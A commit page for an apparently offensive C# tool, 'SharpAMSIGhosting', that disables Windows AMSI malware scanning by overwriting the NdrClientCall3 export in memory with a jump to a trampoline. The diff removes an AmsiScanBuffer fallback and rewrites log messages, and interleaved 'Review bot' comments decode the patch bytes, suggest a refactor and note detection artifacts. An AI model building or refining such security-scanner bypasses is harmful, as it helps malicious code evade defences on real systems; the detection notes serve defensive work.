author | heqnx <root@heqnx.com> | 2025-05-02 13:54:21 +0300 |
---|---|---|
committer | heqnx <root@heqnx.com> | 2025-05-02 13:54:21 +0300 |
commit | d4273e7230aad0b6ad3e86675513710b7e48b774 (patch) | |
tree | 281bb6a2404a5680faf08cbe00c5affe412a8a96 | |
parent | 220bd56c7a3abc0a9c02e820ecc1ee7e2b0b1b5f (diff) | |
download | SharpAMSIGhosting-d4273e7230aad0b6ad3e86675513710b7e48b774.tar.gz SharpAMSIGhosting-d4273e7230aad0b6ad3e86675513710b7e48b774.zip |
removed the amsiscanbuffer fallback v1.0.0
-rw-r--r-- | SharpAMSIGhosting/Program.cs | 9 |
1 files changed, 4 insertions, 5 deletions
diff --git a/SharpAMSIGhosting/Program.cs b/SharpAMSIGhosting/Program.cs
index 75fb518..c9405e6 100644
--- a/SharpAMSIGhosting/Program.cs
+++ b/SharpAMSIGhosting/Program.cs
@@ -84,10 +84,10 @@ namespace AmsiGhost
bool protectResult = Mem.VirtualProtect(func, new UIntPtr(PATCH_SIZE), PAGE_EXECUTE_READWRITE, out oldProtect);
if (!protectResult)
{
- Console.WriteLine($"[-] Failed to unprotect {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory");
+ Console.WriteLine("[-] Failed to unprotect NdrClientCall3 memory");
return;
}
- Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory unprotected");
+ Console.WriteLine("[+] NdrClientCall3 memory unprotected");
long trampAddr = trampoline.ToInt64();
byte[] patch = new byte[] { 0x48, 0xB8 }
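Review bot: With the ternary gone, the name `NdrClientCall3` is hard-coded in both messages here and in the two messages of the second hunk, while the lookup that produces `func` sits outside the hunk, so nothing visible ties the printed name to the export that is actually resolved. If any fallback resolution survives elsewhere in the method, these messages will report the wrong target. Declaring the name once, for example `const string TargetExport = "NdrClientCall3";`, and using it for both the `GetProcAddress` call and the four `Console.WriteLine` calls keeps the log output and the behaviour in step. The enclosing method starts above and continues below this hunk.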
@@ -95,9 +95,8 @@ namespace AmsiGhost
.Concat(new byte[] { 0xFF, 0xE0 })
.ToArray();
Marshal.Copy(patch, 0, func, patch.Length);
- Console.WriteLine($"[+] Patch written to {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")}");
-
- Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} patched - AMSI Ghosting");
+ Console.WriteLine("[+] Patch written to NdrClientCall3");
+ Console.WriteLine("[+] NdrClientCall3 patched - AMSI ghosting complete");
}
catch (Exception ex)
{
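Review bot: The bytes copied over `func` by `Marshal.Copy` carry no comment, and the first half of the array is built in the previous hunk, so a reader has to decode the sequence by hand. `0x48, 0xB8` … `0xFF, 0xE0` is `mov rax, imm64` followed by `jmp rax`, with the immediate presumably being `trampAddr` on the line between the two hunks; a comment such as `// 48 B8 <imm64> FF E0: mov rax, trampoline; jmp rax (x64 absolute jump, 12 bytes)` above the array would say so. For detection work this is the artifact to key on: after the write, the export's first bytes differ from the module image on disk, and the page was switched to `PAGE_EXECUTE_READWRITE` immediately beforehand. The `try` opens above and the `catch` body continues below the hunk.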